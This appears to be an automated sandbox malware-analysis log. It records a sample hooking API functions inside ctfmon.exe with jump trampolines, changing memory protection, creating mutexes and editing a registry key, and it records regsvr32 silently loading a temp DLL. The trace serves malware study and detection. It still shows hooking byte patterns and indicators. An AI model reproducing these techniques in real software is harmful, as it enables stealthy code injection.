Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 EB 7B success or wait 2639622100
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D1AE Length: 5 Value: E9 A4 AE 81 84 success or wait 2639622875
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2639623136
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2639624633
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2639624927
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A5000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 EC 7B success or wait 2639625704
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 5 Value: E9 09 1F 81 84 success or wait 2639626459
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2639626723
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 77212EBC Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2639627280
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 77212EBC Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 2639627568
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50014 Length: 10 Value: 8B FF 55 8B EC E9 A3 2E 7C 76 success or wait 2639629554
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 77212EBC Length: 5 Value: E9 FD 4B F0 89 success or wait 2639630298
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 77212EBC Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2639630558
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C60A1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2639631665
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C60A1 Length: 30 Value: 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 2639631952
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A5001E Length: 10 Value: 8B FF 55 8B EC E9 7E 60 77 76 success or wait 2639632768
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C60A1 Length: 5 Value: E9 6F 1A F5 89 success or wait 2639633513
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C60A1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2639633773
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771CE9C1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2639634785
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771CE9C1 Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 2639637749
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50028 Length: 10 Value: 8B FF 55 8B EC E9 94 E9 77 76 success or wait 2639639409
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771CE9C1 Length: 5 Value: E9 A6 91 F4 89 success or wait 2639640990
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771CE9C1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2639641256
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 77212FC1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2639642242
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 77212FC1 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 2639642822
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50032 Length: 10 Value: 8B FF 55 8B EC E9 8A 2F 7C 76 success or wait 2639644383
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 77212FC1 Length: 5 Value: E9 4B 4C F0 89 success or wait 2639645958
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 77212FC1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2639646181
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C4D8C Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2639647723
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C4D8C Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 2639648379
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A5003C Length: 10 Value: 8B FF 55 8B EC E9 4B 4D 77 76 success or wait 2639650070
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C4D8C Length: 5 Value: E9 25 2F F5 89 success or wait 2639651825
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C4D8C Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2639652090
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C82EA Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2639653829
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C82EA Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 2639654453
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50046 Length: 10 Value: 8B FF 55 8B EC E9 9F 82 77 76 success or wait 2639656047
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C82EA Length: 5 Value: E9 0A FA F4 89 success or wait 2639657574
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C82EA Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2639657838
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771F9100 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2639659014
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771F9100 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 2639659685
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50050 Length: 10 Value: 8B FF 55 8B EC E9 AB 90 7A 76 success or wait 2639661624
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771F9100 Length: 5 Value: E9 34 EC F1 89 success or wait 2639663964
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771F9100 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2639664613
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771D89F7 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2639666092
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771D89F7 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 2639666714
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A5005A Length: 10 Value: 8B FF 55 8B EC E9 98 89 78 76 success or wait 2639667607
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771D89F7 Length: 5 Value: E9 8B F3 F3 89 success or wait 2639668467
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771D89F7 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2639668727
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C79C2 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2639669907
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C79C2 Length: 30 Value: 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 2639670194
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50064 Length: 12 Value: 6A 2C 68 10 7B 1C 77 E9 59 79 77 76 success or wait 2639672892
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C79C2 Length: 5 Value: E9 F0 03 F5 89 success or wait 2639674574
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771C79C2 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2639674837
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771F9C53 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2639676185
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771F9C53 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2639676763
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50070 Length: 10 Value: 8B FF 55 8B EC E9 DE 9B 7A 76 success or wait 2639679848
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771F9C53 Length: 5 Value: E9 B4 E1 F1 89 success or wait 2639681536
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771F9C53 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2639681754
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771D9064 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2639683326
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771D9064 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2639683971
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A5007A Length: 10 Value: 8B FF 55 8B EC E9 E5 8F 78 76 success or wait 2639685791
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771D9064 Length: 5 Value: E9 BB ED F3 89 success or wait 2639688643
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771D9064 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2639688910
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771BB1D8 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2639690597
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771BB1D8 Length: 30 Value: 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 2639691532
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50084 Length: 10 Value: 8B FF 55 8B EC E9 4F B1 76 76 success or wait 2639693675
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771BB1D8 Length: 5 Value: E9 5F CC F5 89 success or wait 2639695392
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 771BB1D8 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2639696597
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB3E2B Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2639696968
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 2639697263
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A5008E Length: 10 Value: 8B FF 55 8B EC E9 98 3D 06 71 success or wait 2639698989
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB3E2B Length: 5 Value: E9 3E E9 66 8F success or wait 2639700704
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB3E2B Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2639701893
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 2639702542
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 2639707881
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB676F Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 2639713051
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB4CB5 Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 2639718384
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 2639725281
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 2639731988
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2639740664
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2639750101
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2639759117
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2639765496
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 2639771769
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 2639777497
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 2639783538
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 2639825606
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 2639829628
System info queried Type: ProcessInformation success or wait 2640130022
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: B10000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2640136003
Thread created PID: 1788 TID: 1284 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\ctfmon.exe Injected: false success or wait 2640450480
Mutant created Name: \BaseNamedObjects\Local\{FA8F3AD4-84A8-4B6A-FB56-FD56EA1DDE44} object name exists 2640452308
System info queried Type: ProcessInformation success or wait 2640455838
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: B10000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2640461603
Thread created PID: 1788 TID: 440 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\ctfmon.exe Injected: false success or wait 2640894695
Mutant created Name: \BaseNamedObjects\Local\{FA8F3AD5-84A9-4B6A-FB56-FD56EA1DDE44} object name exists 2640896751
System info queried Type: ProcessInformation success or wait 2640897410
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: B10000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2640903273
Thread created PID: 1788 TID: 1980 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\ctfmon.exe Injected: false success or wait 2641858459
Mutant created Name: \BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} success or wait 2641860154
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 15807505 success or wait 2641860823
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 15807505 success or wait 2641861350
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 15807505 Type: Binary Data: C4 D1 56 A5 Old data: C5 D1 56 A5 success or wait 2641921699
Analysis File: regsvr32.exe PID: 1008 Parent PID: 1732
+ Sections
+ General
Start time: 05:44:44
Start date: 08/12/2011
Path: C:\WINDOWS\system32\regsvr32.exe
Commandline: regsvr32 -s C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpbt0.dll
Imagebase: 0x1000000
File size: 11776 bytes
MD5 hash: FBDB9D0935B9907B809B381FDDF1627F
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 1B0000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 1D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 220000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 270000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 774E0000 1302528 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 280000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown 6F880000 1875968 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown 77120000 569344 own pid read write object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 3D0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 1010000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 8B0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 380000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 380000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 380000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 8B0000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit 8B0000 401408 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 8B0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 74720000 311296 own pid read write object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 8C0000 262144 own pid read write success or wait 1
Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
User Activities:
+ Window enumerated
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address
0 0 false 50C 1, 902b0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2 1001E31
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2640077778
Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2640084525
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2640089284
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2640093139
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2640094123
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2640094752
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2640098512
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2640098815
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2640099939
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2640108227
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2640113649
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2640119327
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2640136898
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2640137962
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2640156006
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid object name not found 2640168384
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2640171783
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2640178151
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2640193597
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2640197273
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid success or wait 2640201268
Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid object name not found 2640207995
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2640209192
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2640220418
Section loaded Path: \KnownDlls\MSACM32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid object name not found 2640230247
Section loaded Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 2640231437
